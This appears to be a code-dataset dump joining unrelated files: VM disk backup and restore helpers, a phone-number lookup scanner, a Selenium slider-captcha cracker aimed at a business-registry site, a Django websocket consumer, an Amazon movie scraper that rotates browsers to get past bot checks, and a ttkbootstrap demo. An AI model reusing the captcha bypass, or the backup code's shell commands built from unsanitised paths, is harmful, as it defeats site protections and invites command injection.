def get_disk_backup_version(domain, pool, disk):
pool_info = get_pool_info_from_k8s(pool)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
vm_history_file = '%s/vmbackup/%s/history.json' % (pool_info['path'], domain)
vm_disk_full_versions = set()
if os.path.exists(vm_history_file):
with open(vm_history_file, 'r') as f:
vm_history = load(f)
for v in list(vm_history.keys()):
record = vm_history[v]
if disk in list(record.keys()):
vm_disk_full_versions.add(record[disk]['full'])
history_file = '%s/history.json' % disk_backup_dir
disk_versions = []
if os.path.exists(history_file):
with open(history_file, 'r') as f:
history = load(f)
logger.debug(dumps(history))
for full_version in list(history.keys()):
if full_version == 'current':
continue
if full_version in vm_disk_full_versions:
continue
for v in list(history[full_version].keys()):
disk_versions.append(v)
return disk_versions
def get_disk_backup_full_version(domain, pool, disk):
pool_info = get_pool_info_from_k8s(pool)
disk_backup_dir = '%s/vmbackup/%s/diskbackup/%s' % (pool_info['path'], domain, disk)
vm_history_file = '%s/vmbackup/%s/history.json' % (pool_info['path'], domain)
vm_disk_full_versions = set()
if os.path.exists(vm_history_file):
with open(vm_history_file, 'r') as f:
vm_history = load(f)
for v in list(vm_history.keys()):
record = vm_history[v]
if disk in list(record.keys()):
vm_disk_full_versions.add(record[disk]['full'])
history_file = '%s/history.json' % disk_backup_dir
if not os.path.exists(history_file):
raise ExecuteException('', 'not exist history file %s' % history_file)
disk_versions = []
with open(history_file, 'r') as f:
history = load(f)
logger.debug(dumps(history))
for full_version in list(history.keys()):
if full_version == 'current':
continue
if full_version in vm_disk_full_versions:
continue
disk_versions.append(full_version)
return disk_versions
def get_remote_disk_backup_version(domain, disk, remote, port, username, password):
vm_history_file = '/vmbackup/%s/history.json' % domain
ftp = FtpHelper(remote, port, username, password)
vm_history = ftp.get_json_file_data(vm_history_file)
vm_disk_full_versions = set()
if vm_history:
for v in list(vm_history.keys()):
record = vm_history[v]
if disk in list(record.keys()):
vm_disk_full_versions.add(record[disk]['full'])
disk_versions = []
disk_backup_dir = '/vmbackup/%s/diskbackup/%s' % (domain, disk)
history_file = '%s/history.json' % disk_backup_dir
history = ftp.get_json_file_data(history_file)
if history:
logger.debug(dumps(history))
for full_version in list(history.keys()):
if full_version == 'current':
continue
if full_version in vm_disk_full_versions:
continue
for v in list(history[full_version].keys()):
disk_versions.append(v)
return disk_versions
def is_remote_disk_backup_exist(domain, disk, version, remote, port, username, password):
target_dir = '/vmbackup/%s/diskbackup/%s' % (domain, disk)
ftp = FtpHelper(remote, port, username, password)
if ftp.is_exist_dir(target_dir) and ftp.is_exist_file('%s/history.json' % target_dir):
history = ftp.get_json_file_data('%s/history.json' % target_dir)
if disk not in list(history.keys()):
return False
for full_version in list(history.keys()):
if full_version == 'current':
continue
if version in list(history[full_version].keys()):
return True
return False
def backup_snapshots_chain(current, backup_path):
if not os.path.exists(current):
raise ExecuteException('', 'not exist disk dir need to backup: %s' % current)
result = {}
result['current'] = get_disk_info(current)['full_backing_filename']
backup_files = set()
image_file = None
chains = []
checksums = {}
# only backup the current chain
old_current = result['current']
backup_files.add(old_current)
# back up disk image
disk_info = get_disk_info(old_current)
while 'full_backing_filename' in list(disk_info.keys()):
backup_files.add(disk_info['full_backing_filename'])
disk_info = get_disk_info(disk_info['full_backing_filename'])
# record snapshot chain
disk_backup_dir = '%s/diskbackup' % backup_path
backed_disk_file = []
try:
for bf in backup_files:
disk_checksum = backup_file(bf, disk_backup_dir, backed_disk_file)
checksums[bf] = disk_checksum
except Exception as e:
try:
for df in backed_disk_file:
runCmd('rm -f %s' % df)
except:
pass
raise e
for bf in backup_files:
disk_info = get_disk_info(bf)
record = {}
record['path'] = bf
record['checksum'] = checksums[bf]
if 'full_backing_filename' in list(disk_info.keys()):
record['parent'] = disk_info['full_backing_filename']
else:
record['parent'] = ''
chains.append(record)
result['chains'] = chains
return result, backed_disk_file
def backup_file(file, target_dir, backed_disk_file):
# print file
if not os.path.exists(target_dir):
os.makedirs(target_dir)
file_checksum = checksum(file)
logger.debug('%s checksum: %s' % (file, file_checksum))
history_file = '%s/checksum.json' % target_dir
backupRecord = None
history = {}
if os.path.exists(history_file):
with open(history_file, 'r') as f:
history = load(f)
if file_checksum in list(history.keys()):
backupRecord = history[file_checksum]
if not backupRecord:
# backup file
target = '%s/%s' % (target_dir, os.path.basename(file))
if os.path.exists(target):
uuid = randomUUID().replace('-', '')
target = '%s/%s' % (target_dir, uuid)
backed_disk_file.append(target)
runCmd('cp -f %s %s' % (file, target))
# dump hisory
history[file_checksum] = os.path.basename(target)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
with open(history_file, 'w') as f:
dump(history, f)
return file_checksum
def restore_snapshots_chain(disk_back_dir, record, target_dir):
vm_backup_path = os.path.dirname(disk_back_dir)
backup_path = os.path.dirname(vm_backup_path)
# disk_back_dir = '%s/diskbackup' % vm_backup_path
checksum_file = '%s/checksum.json' % disk_back_dir
with open(checksum_file, 'r') as f:
checksums = load(f)
old_to_new = {}
cp_disks = []
chains = record['chains']
try:
# cp all file and make a chain
# logger.debug(dumps(record))
disk_checksums = {}
for d in os.listdir(target_dir):
if d == 'config.json' or d == 'snapshots':
continue
f = '%s/%s' % (target_dir, d)
c = checksum('%s/%s' % (target_dir, d))
disk_checksums[c] = f
snapshot_dir = '%s/snapshots' % target_dir
if os.path.exists(snapshot_dir):
for d in os.listdir(snapshot_dir):
f = '%s/%s' % (snapshot_dir, d)
c = checksum('%s/%s' % (snapshot_dir, d))
disk_checksums[c] = f
for chain in chains:
# print chain['path']
if chain['checksum'] not in list(checksums.keys()):
raise ExecuteException('', 'can not find disk file backup checksum.')
if chain['checksum'] in list(disk_checksums.keys()):
old_to_new[chain['path']] = disk_checksums[chain['checksum']]
logger.debug('do not need cp %s ' % disk_checksums[chain['checksum']])
continue
backup_file = '%s/%s' % (disk_back_dir, checksums[chain['checksum']])
if not os.path.exists(backup_file):
raise ExecuteException('', 'can not find disk backup file %s.' % backup_file)
if chain['parent']:
new_disk_file = '%s/%s' % (target_dir, os.path.basename(chain['path']))
if chain['path'].find(target_dir) < 0:
uuid = randomUUID().replace('-', '')
new_disk_file = '%s/%s' % (target_dir, uuid)
old_to_new[chain['path']] = new_disk_file
runCmd('cp -f %s %s' % (backup_file, new_disk_file))
cp_disks.append(new_disk_file)
else:
# base image
# if image exist, not cp
di_helper = K8sHelper('VirtualMachineDiskImage')
image = os.path.basename(chain['path'])
if di_helper.exist(image):
volume = di_helper.get_data(image, 'volume')
logger.debug('volume')
logger.debug(volume)
if volume and isinstance(volume, dict) and os.path.exists(volume['current']) and checksum(
volume['current']) == chain['checksum']:
old_to_new[chain['path']] = volume['current']
continue
logger.debug('base image: start cp')
if chain['path'].find('snapshots') >= 0:
base_file = '%s/snapshots/%s' % (target_dir, os.path.basename(chain['path']))
else:
base_file = '%s/%s' % (target_dir, os.path.basename(chain['path']))
new_disk_file = '%s/%s' % (target_dir, os.path.basename(chain['path']))
if not os.path.exists(base_file):
old_to_new[chain['path']] = new_disk_file
runCmd('cp -f %s %s' % (backup_file, new_disk_file))
cp_disks.append(new_disk_file)
else:
base_image_checksum = checksum(base_file)
if base_image_checksum == chain['checksum']:
old_to_new[chain['path']] = base_file
else:
old_to_new[chain['path']] = new_disk_file
runCmd('cp -f %s %s' % (backup_file, new_disk_file))
cp_disks.append(new_disk_file)
for df in list(old_to_new.values()):
runCmd('chmod 666 %s' % df)
except ExecuteException as e:
for file in cp_disks:
runCmd('rm -f %s' % file)
raise e
logger.debug('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
logger.debug(dumps(disk_checksums))
logger.debug(dumps(chains))
# reconnect snapshot chain
for chain in chains:
# print dumps(chain)
if chain['parent']:
# parent = '%s/%s' % (disk_dir, os.path.basename(chain['parent']))
# print 'qemu-img rebase -f qcow2 -b %s %s' % (old_to_new[chain['parent']], old_to_new[chain['path']])
runCmd('qemu-img rebase -f qcow2 -u -b %s %s' % (old_to_new[chain['parent']], old_to_new[chain['path']]))
# if this disk has no snapshots, try to delete other file
ss_dir = '%s/snapshots' % target_dir
exist_ss = False
if os.path.exists(ss_dir):
for ss in os.listdir(ss_dir):
try:
ss_info = get_snapshot_info_from_k8s(ss)
exist_ss = True
except:
pass
file_to_delete = []
if not exist_ss:
if os.path.exists(ss_dir):
for ss in os.listdir(ss_dir):
ss_file = '%s/%s' % (ss_dir, ss)
if os.path.isfile(ss_file) and ss_file not in list(old_to_new.values()):
file_to_delete.append(ss_file)
if os.path.exists(target_dir):
for ss in os.listdir(target_dir):
if ss == 'config.json':
continue
ss_file = '%s/%s' % (target_dir, ss)
if os.path.isfile(ss_file) and ss_file not in list(old_to_new.values()):
file_to_delete.append(ss_file)
# if backup_disk['current'].find('snapshots') >= 0:
# disk_current = '%s/snapshots/%s' % (disk_dir, os.path.basename(backup_disk['current']))
# else:
# disk_current = '%s/%s' % (disk_dir, os.path.basename(backup_disk['current']))
disk_current = record['current']
return old_to_new[disk_current], file_to_delete
def check_pool_active(info):
pool_helper = K8sHelper('VirtualMachinePool')
this_node_name = get_hostname_in_lower_case()
pool_node_name = get_node_name(pool_helper.get(info['pool']))
if this_node_name != pool_node_name:
if info['state'] == 'inactive':
error_print(220, 'pool %s is not active, please run "startPool" first' % info['pool'])
else:
return
if this_node_name == pool_node_name and info['state'] == 'active':
try:
auto_mount(info['pool'])
if not is_pool_started(info['poolname']):
runCmd('virsh pool-start %s' % info['poolname'])
except ExecuteException as e:
error_print(221, e.message)
result = get_pool_info_to_k8s(info['pooltype'], info['pool'], info['url'], info['poolname'], info['content'])
# update pool
if operator.eq(info, result) != 0:
k8s = K8sHelper('VirtualMachinePool')
try:
k8s.update(info['pool'], 'pool', result)
except:
pass
if result['state'] != 'active':
error_print(221, 'pool %s is not active, please run "startPool" first' % info['pool'])
def change_k8s_pool_state(pool, state):
helper = K8sHelper("VirtualMachinePool")
pool_info = helper.get_data(pool, "pool")
pool_info['state'] = state
helper.update(pool, 'pool', pool_info)
def success_print(msg, data):
print(dumps({"result": {"code": 0, "msg": msg}, "data": data}))
# exit(0)
def error_print(code, msg, data=None):
if data is None:
print(dumps({"result": {"code": code, "msg": msg}, "data": {}}))
# exit(1)
else:
print(dumps({"result": {"code": code, "msg": msg}, "data": data}))
# exit(1)
if __name__ == '__main__':
print(get_pool_info('07098ca5fd174fccafee76b0d7fccde4'))
print(runCmdAndTransferXmlToJson('virsh pool-dumpxml 07098ca5fd174fccafee76b0d7fccde4'))
# print is_pool_started("170dd9accdd174caced76b0db2230")
# print get_all_node_ip()
# check_pool_active(get_pool_info_from_k8s('migratenodepool22'))
# print is_vm_exist('dsadada')
# pool_helper = K8sHelper('VirtualMachinePool')
# # pool_info = get_pool_info_to_k8s('nfs', 'migratepoolnodepool22', '170dd9accdd174caced76b0db2223', 'vmd')
# # pool_helper.update('migratepoolnodepool22', 'pool', pool_info)
# pool_helper.delete_lifecycle('migratepoolnodepool22')
# print get_os_disk("cloudinitbackup")
# print get_pools_by_node('vm.node25')
# print get_pool_info_from_k8s('7daed7737ea0480eb078567febda62ea')
# jsondicts = get_migrate_disk_jsondict('vm006migratedisk1', 'migratepoolnode35')
# apply_all_jsondict(jsondicts)
# print get_snapshot_info_from_k8s('disktestd313.2')
# print get_pool_info(' node22-poolnfs')
# print is_vm_disk_not_shared_storage('vm006')
# print change_vm_os_disk_file('vm010', '/uit/pooluittest/diskuittest/snapshots/diskuittest.2', '/uit/pooluittest/diskuittest/snapshots/diskuittest.1')
# print get_all_snapshot_to_delete('/var/lib/libvirt/pooltest/disktest/disktest', '/var/lib/libvirt/pooltest/disktest/ss3')
# print os.path.basename('/var/lib/libvirt/pooltest/disktest/disktest')
# print get_disk_snapshots('/var/lib/libvirt/pooltest/disktest/ss1')
# print get_pool_info('test1')
# print get_sn_chain_path('/var/lib/libvirt/pooltest/disktest/0e8e48d9-b6ab-4477-999d-0e57b521a51b')
``` |
{
"source": "742fool/DeadTrapv2",
"score": 3
} |
#### File: DeadTrapv2/scanners/basicScan.py
```python
import json
import requests
import phonenumbers
from phonenumbers import geocoder
from phonenumbers import carrier
from phonenumbers import timezone
def libphonenumbers(number):
print('\n[*] Running local scan...\n')
try:
phonenumber = phonenumbers.parse(number, None)
except:
return False
else:
if not phonenumbers.is_valid_number(phonenumber):
return False
number = phonenumbers.format_number(phonenumber, phonenumbers.PhoneNumberFormat.E164).replace('+', '')
numberCountryCode = phonenumbers.format_number(phonenumber, phonenumbers.PhoneNumberFormat.INTERNATIONAL).split(' ')[0]
countryRequest = json.loads(requests.request('GET', 'https://restcountries.eu/rest/v2/callingcode/{}'.format(numberCountryCode.replace('+', ''))).content)
numberCountry = countryRequest[0]['alpha2Code']
localNumber = phonenumbers.format_number(phonenumber, phonenumbers.PhoneNumberFormat.E164).replace(numberCountryCode, '')
internationalNumber = phonenumbers.format_number(phonenumber, phonenumbers.PhoneNumberFormat.INTERNATIONAL)
print('[+] International format: {}'.format(internationalNumber))
print('[+] Local format: 0{}'.format(localNumber))
print('[+] Country code: {}'.format(numberCountryCode))
print('[+] Location: {}'.format(geocoder.description_for_number(phonenumber, "en")))
print('[+] Carrier: {}'.format(phonenumbers.carrier.name_for_number(phonenumber, 'en')))
for libphonenumbers.timezoneResult in timezone.time_zones_for_number(phonenumber):
print('[+] Timezone: {}'.format(libphonenumbers.timezoneResult))
if phonenumbers.is_possible_number(phonenumber):
print('[*] The number is valid and possible.')
else:
print('(!) The number is valid but might not be possible.')
``` |
{
"source": "743834110/crack-geetest",
"score": 3
} |
#### File: 743834110/crack-geetest/industry_and_commerce.py
```python
import time
from geetest import BaseGeetestCrack
from selenium import webdriver
class IndustryAndCommerceGeetestCrack(BaseGeetestCrack):
"""工商滑动验证码破解类"""
def __init__(self, driver):
super(IndustryAndCommerceGeetestCrack, self).__init__(driver)
def crack(self):
"""执行破解程序
"""
self.input_by_id()
self.click_by_id()
time.sleep(2)
x_offset = self.calculate_slider_offset()
self.drag_and_drop(x_offset=x_offset)
def main():
driver = webdriver.Chrome()
driver.get("http://bj.gsxt.gov.cn/sydq/loginSydqAction!sydq.dhtml")
cracker = IndustryAndCommerceGeetestCrack(driver)
cracker.crack()
print(driver.get_window_size())
time.sleep(3)
driver.save_screenshot("screen.png")
driver.close()
if __name__ == "__main__":
main()
``` |
{
"source": "745184532/cmdb",
"score": 2
} |
#### File: cmdb/chain/consumers.py
```python
from asgiref.sync import async_to_sync
from channels.generic.websocket import WebsocketConsumer
from channels.layers import get_channel_layer
channel_layer = get_channel_layer()
class EchoConsumer(WebsocketConsumer):
def connect(self):
# 创建channels group, 命名为:用户名,并使用channel_layer写入到redis
async_to_sync(self.channel_layer.group_add)(self.scope['user'].username, self.channel_name)
# 返回给receive方法处理
self.accept()
def receive(self, text_data):
async_to_sync(self.channel_layer.group_send)(
self.scope['user'].username,
{
"type": "user.message",
"text": text_data,
},
)
def user_message(self, event):
# 消费
self.send(text_data=event["text"])
def disconnect(self, close_code):
async_to_sync(self.channel_layer.group_discard)(self.scope['user'].username, self.channel_name)
# class StatsConsumer(WebsocketConsumer):
#
# def connect(self):
# async_to_sync(self.channel_layer.group_add)(self.scope['user'].username, self.channel_name)
#
# self.accept()
#
# def receive(self, text_data):
# key = '-'.join(('django-mstats-processlist', str(self.scope['user'].uid)))
# cache.set(key, 'start', timeout=None)
# show_processlist.delay(host=text_data, user=self.scope['user'].username, key=key)
#
# async_to_sync(self.channel_layer.group_send)(
# self.scope['user'].username,
# {
# "type": "user.message",
# "text": text_data,
# },
# )
#
# def user_message(self, event):
# self.send(text_data=event["text"])
#
# def disconnect(self, close_code):
# key = '-'.join(('django-mstats-processlist', str(self.scope['user'].uid)))
# cache.set(key, 'end', timeout=None)
# async_to_sync(self.channel_layer.group_discard)(self.scope['user'].username, self.channel_name)
``` |
{
"source": "745184533/Lab-s-Data-Warehouse",
"score": 3
} |
#### File: 数据准备/数据处理/MovieOrganize.py
```python
import pandas as pd
import numpy as np
import Levenshtein
import re
import math
import codecs
import csv
def calculate(i,j):
# 总相似度
score=1
# 各特征相似度
score_name=1
score_director=1
score_actor=1
score_release=1
score_time=1
# 各特征值
movie_l=webs[i]
name_l=movie_l[2]
director_l=movie_l[15]
actor_l=movie_l[6]
release_l=movie_l[4]
time_l=movie_l[5]
movie_r=webs[j]
name_r=movie_r[2]
director_r=movie_r[15]
actor_r=movie_r[6]
release_r=movie_r[4]
time_r=movie_r[5]
return score
CSV="MovieProducts.csv"
data=pd.read_csv(CSV)
data=np.array(data)
webs=[] # 网页数据列表204654
for frame in data:
j = 0
for i in frame:
if pd.isna(i):
frame[j] = ""
j += 1
webs.append(frame.tolist())
map=[[0]for i in range(len(webs))] # 网页相关程度邻接表 204654
movies=[] # 电影划分,order填充,可在webs里获得完整data
left=0
right=1
HumanSense=0.5 # 将相似度大于0.5的产品判定为相同电影
# 邻接表的构建
for i in range(len(webs)-1):
for j in range(len(webs)-i-1):
left=i
right=j+i+1
similar=calculate(left,right)
print("{}->{}:{}\n".format(left,right,similar))
if similar>=HumanSense:
map[left].append(right)
map[right].append(left)
i=0
```
#### File: 数据准备/爬虫/Team.py
```python
import codecs
import csv
import re
import time
from bs4 import BeautifulSoup as BS
from selenium import webdriver
import signal
import os
def ChromeSet(): # Chrome浏览器驱动
optC = webdriver.ChromeOptions()
optC.add_argument('--lang=en') # 设置网页语言
optC.add_argument('blink-settings=imagesEnabled=false') # 不加载图片,提升运行速度
#optC.add_argument('--headless') # 不加载浏览器界面
return webdriver.Chrome(options=optC)
def EdgeSet(): # Edge浏览器驱动
return webdriver.Edge()
def FireFoxSet(): # FireFox浏览器驱动
optF=webdriver.FirefoxOptions()
optF.add_argument('--lang=en') # 设置网页语言
optF.add_argument('blink-settings=imagesEnabled=false') # 不加载图片,提升运行速度
#optF.add_argument('--headless') # 不加载浏览器界面
return webdriver.Firefox(options=optF)
def resetUrl(URL):
bannedNum = bannedUrl.get(URL, 0)
if (bannedNum == 0):
bannedUrl[URL] = 1
URLLIST.append(URL + '\n')
url = open(Rest, "a+")
url.write(URL+"\n")
url.close()
browser[0] += 1
elif (bannedNum <= 2):
bannedUrl[URL] = bannedNum + 1
URLLIST.append(URL + '\n')
url = open(Rest, "a+")
url.write(URL+"\n")
url.close()
browser[0] += 1
else:
unsolvedUrl = open(UnSOLVED, "a") # 不可访问的网址
unsolvedUrl.write("{}\n".format(URL))
unsolvedUrl.close()
browser[0] += 1
#time.sleep(30)
def get_pid(driver):
# chromepid = int(driver.service.process.pid)
pid=int(driver.service.process.pid)
i=0
return (pid)
def kill_browser(pid):
try:
os.kill(pid, signal.SIGTERM)
return 1
except:
return 0
def closeBrowser(driver):
pid=0
try:
pid=get_pid(driver)
driver.close()
driver.quit()
except:
print("cant close the process!")
else:
print("close the process successfully!")
try:
kill_browser(pid)
except:
print("cant kill the process!")
else:
print("kill the process successfully!")
def connect_to_web(URL,order): # 访问并处理数据
Data=[]
driver = None
try: # 浏览器选择,如果某个浏览器未安装,注释相应的函数,下方的调用换成已经安装driver的浏览器(推荐优先安装chrome和edge,firefox返回验证码概率较高)
if(browser[0]%3==0):
driver=ChromeSet()
elif(browser[0]%3==1):
driver=FireFoxSet()
else:
driver=ChromeSet()
except:
time.sleep(3)
print("\nWebsite {} Driver not ready ,jump!".format(order)) # Driver异常处理
resetUrl(URL)
try:
closeBrowser(driver)
except:
return
return
try:
driver.get("https://www."+URL)
#time.sleep(3)
except: # 访问超时处理
time.sleep(3)
print("\nWebsite {} timeout ,jump!".format(order)) # get超时异常处理
resetUrl(URL)
try:
closeBrowser(driver)
except:
return
return
try: # 判定网站类型
name=driver.find_element_by_css_selector("[class='_1GTSsh _2Q73m9']").text
except: # 爬取Movie&TV网站数据
try: # 获取Movie&TV名称
name=driver.find_element_by_id("productTitle").text
except: # 判定非正常页面处理
time.sleep(3)
print("\nWebsite {} kill the robot ,jump!".format(order)) # 验证码及无法访问页面异常处理
resetUrl(URL)
try:
closeBrowser(driver)
except:
return
return
else:
Data.append(urlOrder[0])
Data.append(URL)
Data.append(name)
try:
# 获取 html
data=driver.find_element_by_css_selector("[class='a-unordered-list a-nostyle a-vertical a-spacing-none detail-bullet-list']").get_attribute('innerHTML')
except: # 未获取到填充空值
Data.append(URL[-10:])
Data.append("")
Data.append("")
Data.append("")
Data.append("")
Data.append("")
else:
# html中匹配字符串
ReleaseTime=re.search(r"(?<=Release date\n:\n</span>\n<span>).*?(?=</)",data)
Time = re.search(r"(?<=Run time\n:\n</span>\n<span>).*?(?=</)", data)
Director = re.search(r"(?<=Director\n:\n</span>\n<span>).*?(?=</)", data)
Writer = re.search(r"(?<=Writers\n:\n</span>\n<span>).*?(?=</)", data)
Actors = re.search(r"(?<=Actors\n:\n</span>\n<span>).*?(?=</)", data)
Data.append(URL[-10:])
if (ReleaseTime == None):
Data.append("")
else:
Data.append(ReleaseTime.group(0))
if (Time == None):
Data.append("")
else:
Data.append(Time.group(0))
if (Director == None):
Data.append("")
else:
Data.append(Director.group(0))
if (Writer == None):
Data.append("")
else:
Data.append(Writer.group(0))
if (Actors == None):
Data.append("")
else:
Data.append(Actors.group(0))
# 爬取type
try:
type=driver.find_element_by_xpath("/html/body//div[@id='wayfinding-breadcrumbs_feature_div']/ul/li[3]/span/a").text
except:
Data.append("")
else:
Data.append(type)
# 爬取comments
try:
comments=re.search(r"([+-]?\d+(\.\d+)?)",driver.find_element_by_id("acrCustomerReviewText").text).group(0)
except:
Data.append("")
else:
Data.append(comments)
# 爬取format
formatTag=''
try:
soup=BS(driver.find_element_by_id("bylineInfo").get_attribute('innerHTML'),'lxml')
format = soup.find(text=(u"Format: ")).find_next('span').text
except:
Data.append("")
else:
formatTag=format
Data.append(format)
# 爬取cost
try:
soup=BS(driver.find_element_by_id("tmmSwatches").get_attribute("innerHTML"),'lxml')
cost = soup.find(text=formatTag).find_next('span').text
cost=re.search(r"([+-]?\d+(\.\d+)?)",cost).group(0)
except:
Data.append("")
else:
cost='$'+cost
Data.append(cost)
# 爬取grade
try:
grade=re.search(r"(?<=alt\">)(.+?)(?=out)",driver.find_element_by_css_selector("[class='a-popover-trigger a-declarative']").get_attribute('innerHTML')).group(0)
except:
Data.append("")
else:
Data.append(grade)
print("\nWebsite {} successfully downloaded".format(order))
# 爬取Prime Video数据
else:
Data.append(urlOrder[0])
Data.append(URL)
Data.append(name)
Data.append(URL[-10:])
# 爬取ReleaseTime
try:
ReleaseTime=driver.find_element_by_css_selector("[data-automation-id=release-year-badge]").text
except:
Data.append("")
else:
Data.append(ReleaseTime)
# 爬取Time
try:
Time=driver.find_element_by_css_selector("[data-automation-id=runtime-badge]").text
except:
Data.append("")
else:
Data.append(Time)
try: # 获取部分HTML
metaInfo=driver.find_element_by_id("meta-info").get_attribute('innerHTML')
except:
Data.append("")
Data.append("")
Data.append("")
Data.append("")
else:
try:
# 爬取Director
soup=BS(metaInfo,'lxml')
Director=soup.find(text=(u"Directors")).find_parent('dl').find_all(class_="_1NNx6V")
except:
Data.append("")
Data.append("")
else:
Dirs = ''
for i in Director:
Dirs += i.text
Dirs += ','
Dirs = Dirs[:-1]
Data.append(Dirs)
Data.append("")
try:
# 爬取Actor
soup=BS(metaInfo,'lxml')
Actor=soup.find(text=(u"Starring")).find_parent('dl').find_all(class_="_1NNx6V")
except:
Data.append("")
else:
Acts = ''
for i in Actor:
Acts += i.text
Acts += ','
Acts = Acts[:-1]
Data.append(Acts)
try:
# 爬取type
soup=BS(metaInfo,'lxml')
Type=soup.find(text=(u"Genres")).find_parent('dl').find_all(class_="_1NNx6V")
except:
Data.append("")
else:
types = ''
for i in Type:
types += i.text
types += ','
types = types[:-1]
Data.append(types)
# 爬取comments
try:
HTML=driver.find_element_by_css_selector("[data-automation-id=customer-review-badge]").get_attribute('innerHTML')
comments = re.search(r"(?<=nbsp;\()(.+?)(?=\)</)", HTML).group(0)
except:
Data.append("")
else:
Data.append(comments)
# 爬取format
try: # 获取部分HTML
metaInfo = driver.find_element_by_id("btf-product-details").get_attribute('innerHTML')
except:
Data.append("")
else:
try:
soup = BS(metaInfo, 'lxml')
format = soup.find(text=(u"Format")).find_parent('dt').find_next_sibling('dd')
except:
Data.append("")
else:
Data.append(format.text)
# 爬取cost
try:
firstHtml=driver.find_element_by_css_selector("[class=_2U1bmy]").get_attribute('innerHTML')
soup=BS(firstHtml,'lxml')
text=soup.find(text=(u"Buy ")).find_parent('button').text
cost=re.search(r'([+-]?\d+(\.\d+)?)',text).group(0)
except:
Data.append("")
else:
cost = "$"+cost
Data.append(cost)
# 爬取grade
try:
HTML=driver.find_element_by_css_selector("[data-automation-id=customer-review-badge]").get_attribute('outerHTML')
grade = re.search(r"(?<=Rated)(.+?)(?=out)", HTML).group(0)
except:
Data.append("")
else:
Data.append(grade)
print("\nWebsite {} successfully downloaded".format(order))
# 实时数据导出csv
website = codecs.open(CSV, 'a+', 'utf-8') # 数据集
writer = csv.writer(website)
try:
try:
closeBrowser(driver)
except:
pass
writer.writerow(Data)
except:
print("数据异常,未能写入csv文件")
unsolvedUrl = open(UnSOLVED, "a") # 不可访问的网址
unsolvedUrl.write("{}\n".format(URL))
unsolvedUrl.close()
else:
print("数据成功写入csv文件")
website.close()
urlOrder[0] += 1
return
# 初始化文件路径 ,每个进程都要进行检查配置(当前使用的是样例文件)
CSV='web42000.csv' # 存储data用CSV文件名
UnSOLVED='unsolvedUrl42000.txt' # 存储访问失败url用txt文件名
Rest="url_42000.txt" # 待访问url文件名
Log="log42000.txt" # 记录指针
# 初始化全局变量
url=open(Rest,"r")
log=open(Log,"r")
URLLIST=url.readlines()
bannedUrl={} # 访问失败的url
browser=[0] # 浏览器切换编号
urlOrder=[int(log.readline()[:-1])]
i=int(log.readline()[:-1])
url.close()
log.close()
# Spider is running
while True:
connect_to_web(URLLIST[i][:-1],i)
i+=1
log = open(Log, "w")
log.write(str(urlOrder[0])+'\n')
log.write(str(i)+'\n')
log.close()
#time.sleep(random.random()*2)
if(len(URLLIST)==i+1):
print("Task Complete")
break
``` |
{
"source": "745404527/ttkbootstrap",
"score": 2
} |
#### File: src/ttkbootstrap/__main__.py
```python
import ttkbootstrap as ttk
from ttkbootstrap.constants import *
from ttkbootstrap.dialogs import Messagebox
from ttkbootstrap.scrolled import ScrolledText
def setup_demo(master):
ZEN = """Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!"""
root = ttk.Frame(master, padding=10)
style = ttk.Style()
theme_names = style.theme_names()
theme_selection = ttk.Frame(root, padding=(10, 10, 10, 0))
theme_selection.pack(fill=X, expand=YES)
theme_selected = ttk.Label(
master=theme_selection, text="litera", font="-size 24 -weight bold"
)
theme_selected.pack(side=LEFT)
lbl = ttk.Label(theme_selection, text="Select a theme:")
theme_cbo = ttk.Combobox(
master=theme_selection,
text=style.theme.name,
values=theme_names,
)
theme_cbo.pack(padx=10, side=RIGHT)
theme_cbo.current(theme_names.index(style.theme.name))
lbl.pack(side=RIGHT)
ttk.Separator(root).pack(fill=X, pady=10, padx=10)
def change_theme(e):
t = cbo.get()
style.theme_use(t)
theme_selected.configure(text=t)
theme_cbo.selection_clear()
default.focus_set()
theme_cbo.bind("<<ComboboxSelected>>", change_theme)
lframe = ttk.Frame(root, padding=5)
lframe.pack(side=LEFT, fill=BOTH, expand=YES)
rframe = ttk.Frame(root, padding=5)
rframe.pack(side=RIGHT, fill=BOTH, expand=YES)
color_group = ttk.Labelframe(
master=lframe, text="Theme color options", padding=10
)
color_group.pack(fill=X, side=TOP)
for color in style.colors:
cb = ttk.Button(color_group, text=color, bootstyle=color)
cb.pack(side=LEFT, expand=YES, padx=5, fill=X)
rb_group = ttk.Labelframe(
lframe, text="Checkbuttons & radiobuttons", padding=10
)
rb_group.pack(fill=X, pady=10, side=TOP)
check1 = ttk.Checkbutton(rb_group, text="selected")
check1.pack(side=LEFT, expand=YES, padx=5)
check1.invoke()
check2 = ttk.Checkbutton(rb_group, text="alternate")
check2.pack(side=LEFT, expand=YES, padx=5)
check4 = ttk.Checkbutton(rb_group, text="deselected")
check4.pack(side=LEFT, expand=YES, padx=5)
check4.invoke()
check4.invoke()
check3 = ttk.Checkbutton(rb_group, text="disabled", state=DISABLED)
check3.pack(side=LEFT, expand=YES, padx=5)
radio1 = ttk.Radiobutton(rb_group, text="selected", value=1)
radio1.pack(side=LEFT, expand=YES, padx=5)
radio1.invoke()
radio2 = ttk.Radiobutton(rb_group, text="deselected", value=2)
radio2.pack(side=LEFT, expand=YES, padx=5)
radio3 = ttk.Radiobutton(
master=rb_group, text="disabled", value=3, state=DISABLED
)
radio3.pack(side=LEFT, expand=YES, padx=5)
ttframe = ttk.Frame(lframe)
ttframe.pack(pady=5, fill=X, side=TOP)
table_data = [
("South Island, New Zealand", 1),
("Paris", 2),
("<NAME>", 3),
("Maui", 4),
("Tahiti", 5),
]
tv = ttk.Treeview(master=ttframe, columns=[0, 1], show=HEADINGS, height=5)
for row in table_data:
tv.insert("", END, values=row)
tv.selection_set("I001")
tv.heading(0, text="City")
tv.heading(1, text="Rank")
tv.column(0, width=300)
tv.column(1, width=70, anchor=CENTER)
tv.pack(side=LEFT, anchor=NE, fill=X)
# # notebook with table and text tabs
